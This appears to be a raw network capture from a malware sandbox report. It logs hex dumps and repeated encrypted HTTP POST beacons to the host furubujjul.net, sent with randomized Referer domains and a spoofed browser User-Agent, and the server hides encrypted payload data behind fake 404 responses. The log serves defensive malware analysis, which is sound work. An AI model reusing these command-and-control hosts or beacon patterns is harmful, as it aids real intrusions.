                                                                                                                                  Data Raw: 33 38 33 30 0d 0a 18 00 00 00 1f 3d 52 a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 0c 8a a1 00 37 cc 03 00 34 6f 8a 38 01 00 00 00 02 00 9e 03 00 00 73 d2 09 b6 c9 de db c5 ba 1e d7 7f 00 12 17 00 23 c9 75 21 7d 31 a2 02 6b a5 2d 41 ec 51 18 fa f8 e1 fc b7 d5 59 5e d9 fc 05 8a e6 2e b0 b3 25 e5 ea a7 6b bf aa d2 2a a1 30 2e 91 f4 d1 8f ea 9f c6 25 9c c5 89 09 cb 73 4a b2 26 d8 20 90 41 44 69 cf 7e 2f 45 4f d8 13 77 10 87 39 b4 bf 0f f7 e9 19 82 a7 10 b1 d7 19 1a 19 6a 33 fc 4e ec 20 86 9f cf 03 46 7d f0 e6 e5 4f a4 db 03 b4 3f dc 6e 62 a8 cf d0 14 a1 8b 5a 40 bb 9c 22 79 f8 02 92 87 b6 85 0e 2a 26 b7 a0 50 44 13 d1 ad da 68 6b 16 86 cc 76 b9 cc c2 8b e1 c5 1a 29 ca ae 93 ea 2a 85 ed cb d3 f5 00 0b 8c 84 9b 73 73 ac 0e 89 cf 08 3b 19 e1 d1 18 0b 83 49 65 d5 bc a8 fb f8 75 ea 73 e5 36 e7 89 9e bc fc e0 93 9f 0e 30 e3 b1 93 95 97 a7 51 6e c6 76 98 34 61 81 b9 d4 29 1e 0b 48 34 51 ea a8 27 bd a7 d3 19 7b ba fb 14 37 89 40 35 c9 72 ce ff 7e 73 02 80 1d 34 a3 d6 d5 35 54 16 c0 8c 0b b9 9c 39 cc 5a 58 e4 72 4a e6 3d ac 59 3b f2 1d 17 db 53 f1 f9 f8 6d 3c cd 87 c5 4c 80 7e b9 38 2b 2b 80 c9 45 28 26 8c 39 c1 e6 f7 06 d2 9f 3e 54 78 a5 8f 04 e0 44 d8 60 ef b0 31 16 26 48 3c be 6d 48 19 5f 48 77 e4 60 01 bd 87 b0 1c 9d a1 16 f4 36 d8 35 bf ff c2 92 ea 11 27 67 98 42 42 9d 33 db ad c4 a3 26 8a 4b 66 21 d8 e8 f5 cb c5 74 47 a9 b2 e7 8c 03 31 86 6a da 0d d8 d6 c4 39 45 06 a7 92 40 bc b7 0c ee a1 e3 2d e7 7f ff 08 9e 1a e4 a2 39 f6 af eb 37 f9 22 7e d2 9a 52 2e a6 c0 ce 7d 15 3c f7 86 de a3 9b c7 d1 a6 f5 37 e4 1d 47 e4 a8 f1 e3 34 b5 9d 6b e1 c6 0f 1e c2 d1 4c 69 46 31 be 52 37 2a 13 f1 90 bb 5e 00 af bd cf d3 34 dc cd 26 20 32 30 1e 71 18 15 45 d5 f8 9e 0c 94 79 ea b4 f4 f6 da 66 24 c8 7b 72 72 58 6f 47 16 74 8a bd ad 34 13 13 7d 27 a1 79 5d b2 03 f1 af 97 4a cd 31 e2 5d d4 33 e6 16 91 9e fa ae ac e7 2e be bd 94 e8 0e d8 7b bc f4 e5 63 8c d4 89 47 d2 c8 81 4f 81 4f f3 55 43 56 9b 62 c8 4b 42 b3 0a f7 40 ec 9a 8a a3 0e c2 c8 6e 35 97 c7 a8 aa 86 3a 19 e2 ca 43 2a be 48 8a 79 b3 54 95 5f 47
                                                                                                                                  Data Ascii: 3830=R7f0|gW5p@E74o8s#u!}1k-AQY^.%k*0.%sJ& ADi~/EOw9j3N F}O?nbZ@"y*&PDhkv)*ss;Ieus60Qnv4a)H4Q'{7@5r~s45T9ZXrJ=Y;Sm<L~8++E(&9>TxD`1&H<mH_Hw`65'gBB3&Kf!tG1j9E@-97"~R.}<7G4kLiF1R7*^4& 20qEyf${rrXoGt4}'y]J1]3.{cGOOUCVbKB@n5:C*HyT_G
                                                                                                                                  Oct 17, 2022 22:06:28.109220982 CEST21INData Raw: 5b d7 47 fd f7 5f 41 16 04 f0 67 35 8b 47 47 b8 26 83 63 1f 06 56 97 9b c9 11 b7 a7 b0 81 21 59 20 1a 5b 8c 1e f9 c3 97 29 59 20 d5 16 8d 88 d8 24 27 06 7e 2a d4 49 96 b7 95 e2 c7 c4 c3 58 e2 79 dd 83 78 0c 00 9c 2f 73 9d 0b d2 68 ac 80 b9 86 58
                                                                                                                                  Data Ascii: [G_Ag5GG&cV!Y [)Y $'~*IXyx/shX#b!0&%Ud{wP*I,MHR4J16t p|/*BpLa.{AMS+UPba2?m[jKaAUwy"kcA36
                                                                                                                                  Oct 17, 2022 22:06:28.109239101 CEST22INData Raw: 39 24 a2 c7 8e c1 9a 58 fa 58 91 98 ef b0 de 8d fb 45 92 6c cf 38 a0 20 a0 02 f4 ae 4c c5 2b fc d3 32 ef 7a c7 b4 6a 5d fc 2a 24 f8 56 34 cc f0 4c c5 f1 77 9e 23 ce 10 6b 3e 2a 22 2b 88 46 dc c5 56 a4 90 a0 6d d7 f7 5f cc 15 8f 2a 93 d4 4c 76 ac
                                                                                                                                  Data Ascii: 9$XXEl8 L+2zj]*$V4Lw#k>*"+FVm_*LvR/!X`8\^,wlV m$/4Jo'a7aPc0f>_'Ue|:0Xf$S]4H`]3sY3h&V=9UP.uY
                                                                                                                                  Oct 17, 2022 22:06:28.109255075 CEST24INData Raw: f5 be 22 37 44 bd 2d 72 46 47 e2 2a 92 22 bc bc a3 f0 c6 59 f9 a7 0f 69 06 47 16 9c e5 03 71 d4 a3 6b 11 3d 57 25 da c9 16 e3 40 b4 e9 d7 e8 12 a1 6d 89 d4 34 9f 17 b6 b7 3e 8d 08 61 89 31 19 65 f2 47 0a 3c 9c 54 7e 82 17 f4 76 c1 d1 a5 f0 82 7f
                                                                                                                                  Data Ascii: "7D-rFG*"YiGqk=W%@m4>a1eG<T~vZAz2mF<,At5HYAZ<$:ll~sag|+qp+e?r/}Q3\%ke|l;`7^89Iz)IJktRdP
                                                                                                                                  Oct 17, 2022 22:06:28.109273911 CEST25INData Raw: 26 56 c8 14 9c 5d a1 dc 61 b7 8d 14 8b 8d 13 ad ab df eb ae 6d 5c c2 48 68 30 b0 05 95 2a 60 ee ee 49 9d 3d 4e 83 8d d0 09 3e e8 42 54 3b 88 3e 65 9e b3 3e 2c 85 c1 23 a2 f2 48 d1 ac 62 6b b4 c3 60 32 ab 2e ca 70 9b 58 31 2f df 80 6d 72 29 9d d3
                                                                                                                                  Data Ascii: &V]am\Hh0*`I=N>BT;>e>,#Hbk`2.pX1/mr)6~Ms)<F9I(zroKCd]b2$= y>p@ha%rq9c)}S@(|09&7}OMwOi%v,t!n"!d)&+
                                                                                                                                  Oct 17, 2022 22:06:28.109291077 CEST26INData Raw: 10 16 7f d5 89 a3 ce c5 23 87 49 90 b6 e9 65 21 38 9b 0e ca f1 55 30 ff 5c 21 a2 63 a0 3e 2a e7 81 8b 2d e5 b5 af 53 01 75 3b 33 59 09 36 ff d7 05 c7 82 98 de 36 3a da ed 72 94 29 60 c5 ab c2 56 a7 72 55 08 f1 80 4b 22 36 65 19 8f 43 72 6d 33 46
                                                                                                                                  Data Ascii: #Ie!8U0\!c>*-Su;3Y66:r)`VrUK"6eCrm3FslLsg7S&dw?VmNI% C-Kl=E.%f:D|r{KZdo0SHR"<067kS-$3Gk]E"<nDBUAZv}Qb
                                                                                                                                  Oct 17, 2022 22:06:28.109308958 CEST27INData Raw: c3 45 c1 ad e1 5d b5 33 3e 86 b4 76 cc e4 5a c9 81 e2 ab 42 20 41 71 9e 1c bf a5 f1 22 bf de 9e f5 ba 54 3d da ea 5c 22 ad d4 ab 1b bd ae 47 60 0d 20 35 81 cb b0 8c fb 30 d2 be f3 cc e4 af 8c 6f f2 33 82 d9 45 80 1c 85 eb 8a b1 17 8d 7e 45 03 a6
                                                                                                                                  Data Ascii: E]3>vZB Aq"T=\"G` 50o3E~EX;\r+xO:*w|ZwJa&?vvS#(;yH+@a~l/)]|xC#Incw)4fUP% 4=Q.Sric"?qc-eX
                                                                                                                                  Oct 17, 2022 22:06:28.109325886 CEST29INData Raw: 48 c4 b8 bb 47 05 42 47 80 ba 39 9e 59 ac cf 69 e2 7c 70 1d 77 e6 fe 31 76 72 47 b9 3b a4 04 a1 1c 65 1c 6f a2 4c f6 8c 08 59 3b ed db a7 77 51 8f 04 70 7f 22 6f 76 2b 8d 74 55 68 10 71 27 b6 b8 0c 89 3f 67 68 4c f6 a6 bc 7a 7d 30 38 bd cf 1e cb
                                                                                                                                  Data Ascii: HGBG9Yi|pw1vrG;eoLY;wQp"ov+tUhq'?ghLz}083U"/JK.vl+sKCN#Ip2T%#A'6+jeD@J/]yL+/*(RDrJCh};L{BucJx<6u
                                                                                                                                  Oct 17, 2022 22:06:28.109344006 CEST30INData Raw: 0b 91 5b b0 b1 fe c2 10 4e fc f4 a9 9e 7e 17 0b 51 97 d5 64 f2 4b 2d 8b 82 a0 6e 52 a6 c8 4b 01 de af 38 03 09 37 06 92 55 21 8b 56 81 30 4d 87 3e 59 6c 18 f1 db 35 a1 7e fb be b1 ac db 08 8f 6e be 44 7b 55 62 34 a5 f1 e0 5b f7 ec af 39 2c f6 81
                                                                                                                                  Data Ascii: [N~QdK-nRK87U!V0M>Yl5~nD{Ub4[9,IiB6:gE@?2S!;}BG^$ z)FY' i)C'=BdlO&dt^I{{r"hAT0\v!AVch[KosO
                                                                                                                                  Oct 17, 2022 22:06:28.109361887 CEST31INData Raw: a5 31 e1 97 23 c9 75 15 dd 0f e9 33 c8 57 98 32 b1 ec fb e8 0c 04 26 04 61 e3 e9 43 a2 e3 24 11 33 87 05 83 c5 03 c8 98 07 9c 5a d7 a7 1c 4b 8a c7 a7 de a4 d4 89 d0 2d e3 f0 59 b5 82 d7 71 19 05 c5 93 81 67 ff a3 31 51 e4 d5 2a 2f 34 bc a7 57 f8
                                                                                                                                  Data Ascii: 1#u3W2&aC$3ZK-Yqg1Q*/4W$~}y}Y{X='S>O1iGY>_#Yzm#_an+_S^D*Nmc+nn2H7Rp}FyvXf#H-1++6)E+gKY/g;
                                                                                                                                  Oct 17, 2022 22:06:28.109378099 CEST33INData Raw: 4f c4 6e d8 d6 3f 92 f2 ee 8f ca 81 e3 3b f1 57 a7 15 c3 13 ba 1a bf 28 ad 9a 2d 78 f2 25 79 65 04 be f1 a4 bc 1b 38 a1 c2 30 ec b9 39 1a 10 ac 27 f8 65 29 42 09 30 e4 07 fe 98 89 01 ed 98 8b b4 3a a5 25 5d 69 d6 43 f8 25 f0 6e 93 c1 56 84 ee 10
                                                                                                                                  Data Ascii: On?;W(-x%ye809'e)B0:%]iC%nV$)x3F?^4XE;;t{!C&h4\=qC^Dj@OJp+mS*$(AP$,Vk6Q:;)yH=1Oam@06em_:|=-82
                                                                                                                                  Oct 17, 2022 22:06:28.399422884 CEST278OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://ariymxinp.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 225
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:28.399497032 CEST278OUTData Raw: 48 9d 89 cd 3c 6e 22 52 2a 77 53 25 7c af 53 cd 5b 18 ef 1a fb 1c dd ac b5 6e a4 f2 07 f6 d3 96 fe ae 8a c2 72 32 e3 b5 a5 2c 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 ba 8a 14 62 cd d6 4f 96 b1 af 55 bf
                                                                                                                                  Data Ascii: H<n"R*wS%|S[nr2,jp_S61oJf=B!bOUq<6LIXColLJGp'+{9;z:<S{-*6eBUt`(uuh+1BH'+>a.
                                                                                                                                  Oct 17, 2022 22:06:28.500035048 CEST279INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:28 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KUWoAro4NNt%2FHkTq3NXBVoTYzm8%2Fc5LLM3XNqxMxxhWzGlP2mWwGy8%2Fre%2FGYHfNo4qfoNE4QxZycKeKjM1Podnv%2B%2FcIlHo%2FDXoXYR4HUb95MOqJYDxgqIybV2D7LZ2gXIw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7ab884306d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:28.512474060 CEST279OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://okrenbrpq.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 348
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:28.512646914 CEST280OUTData Raw: 48 9d 89 cd 3c 6e 22 52 2a 77 53 25 7c af 53 cd 5b 18 ef 1a fb 1c dd ac b5 6e a4 f2 07 f6 d3 96 fe ae 8a c2 72 32 e3 b5 a5 2c 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bb 8a 14 62 cd d6 4f 96 af de 1f f1
                                                                                                                                  Data Ascii: H<n"R*wS%|S[nr2,jp_S61oJf=B!bOi|nUJ1N`R=u%iePmY/;#sy9NC%?FWUE\k/AJ$!"z[}FPD~C;~8-CJ
                                                                                                                                  Oct 17, 2022 22:06:28.626049995 CEST281INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:28 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Z0mKA1qbWJO5wreHynT1UWv99rf%2BjxZXEqsThzPL%2BLBuk37HPrPW9ovFsC7%2BmGyfv0XCZSD8y6VqrA%2BMt1YZ%2Brl2uie88lq3%2BVxy7uGGkCRmA85vMOZ9jXW4fOlPB1BQUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7ac496c06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 37 64 36 63 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 32 59 3e b0 2b c6 28 d9 87 96 d3 15 5b 05 0f d6 c0 97 ac f7 a5 3b e2 df 53 23 30 54 1f f5 09 16 5b 6c 32 60 d2 dd 6d 61 20 2a 85 19 69 f7 6b db bb b2 07 5a 83 a4 07 0d 99 17 c4 f8 7a 7c e1 66 a2 cc f8 83 61 34 77 70 36 f8 37 33 50 97 23 f5 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e c8 00 59 b9 c7 75 d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e b7 f6 ff 78 f7 4a db c4 0d 13 13 a9 bf e1 92 24 18 4f c5 03 b1 c9 a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 7a d4 96 be 21 51 61 36 3c 35 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 4b 0e e5 0e 8c eb 7e 71 eb 90 d4 1a b0 d0 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 22 67 0e 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 73 f0 cc 46 99 48 15 ac af eb d9 55 3d af ba 68 92 1e ff 9d 57 7d 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 8d 9b de 8e 82 11 e8 e4 1f ac a0 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 19 70 9a a2 ce 57 a3 6c e4 9b 1f d4 4c 6a 91 9c 17 0f f1 2c a8 af 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 4a e3 96 0c 06 1a 50 6d 43 14 f2 8b 8b e1 72 5b d7 9c c4 c3 e0 2b 9d bf bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88
                                                                                                                                  Data Ascii: 7d6c`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*2Y>+([;S#0T[l2`ma *ikZz|fa4wp673P#p"XJ3Ob>!ZC:>YuSSQ*{~xJ$Oa~i~]DzN,z!Qa6<5|(kJk?a]V4l3l)|K~qJO;yLuVW;*r#"g1er+Lc1<'isFHU=hW}U@Wd{9f(B@w=fd3Dw)pKNTUo)2([>T~pWlLj,[}JPmCr[+z(Fzk7 RH:M?~Mpvn%.5_)CCUb:@
                                                                                                                                  Oct 17, 2022 22:06:29.999082088 CEST1065OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://gvuhujihq.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 139
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:29.999208927 CEST1065OUTData Raw: 48 9d 89 cd 3c 6e 22 52 2a 77 53 25 7c af 53 cd 5b 18 ef 1a fb 1c dd ac b5 6e a4 f2 07 f6 d3 96 fe ae 8a c2 72 32 e3 b5 a5 2c 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 bb 8a 14 62 cc d6 4f 96 f0 c4 0d d3
                                                                                                                                  Data Ascii: H<n"R*wS%|S[nr2,jp_S61oJf=B!bO$e)LkSL6f`K>4=RjgP
                                                                                                                                  Oct 17, 2022 22:06:30.102993011 CEST1066INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:30 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2j%2BG0TuBeEb%2B718l4IcNHqvsmb5%2FURQTJ2nlKZ%2BrZIAdPO59uvg1H%2BpCEnm9OYqyqPP8zwBWiwAu8zUiZ33Vjes1yVUcLLfR8ICZuLcJDKHOVKmpZaTP3nUUAf8b3nzzKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7b5894a06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:30.119431019 CEST1067OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://pyqxykfbyx.net/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 334
                                                                                                                                  Host: furubujjul.net
                                                                                                                                  Oct 17, 2022 22:06:30.119483948 CEST1067OUTData Raw: 48 9d 89 cd 3c 6e 22 52 2a 77 53 25 7c af 53 cd 5b 18 ef 1a fb 1c dd ac b5 6e a4 f2 07 f6 d3 96 fe ae 8a c2 72 32 e3 b5 a5 2c 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 b8 8a 14 62 cd d6 4f 96 af f5 0a da
                                                                                                                                  Data Ascii: H<n"R*wS%|S[nr2,jp_S61oJf=B!bOse;!xgevMH9B=<r1}|vH5X-QZa]Y T;;p*.4zBBvb#SJpZ>Z&=~w
                                                                                                                                  Oct 17, 2022 22:06:30.241849899 CEST1068INHTTP/1.1 404 Not Found
                                                                                                                                  Date: Mon, 17 Oct 2022 20:06:30 GMT
                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: keep-alive
                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FnEqIOUVgHkCA6dmPTX8MQA57DvXbCBz%2FkdAkHQGY31oDK%2FwrF38ZS4sSOWnaTH7aezykVmTzii76QS1MbfhqeAg7aj4VO2m%2FGG%2BXBc3fetrR%2BqU%2F2lkC8XPQqhokkbEWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 75bba7b64a9c06d1-LHR
                                                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                  Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                  Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                                                                                                                                  Oct 17, 2022 22:06:30.253982067 CEST1069OUTPOST / HTTP/1.1
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Accept: */*
                                                                                                                                  Referer: http://egupm.com/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                  Content-Length: 110
                                                                                                                                  Host: furubujjul.net
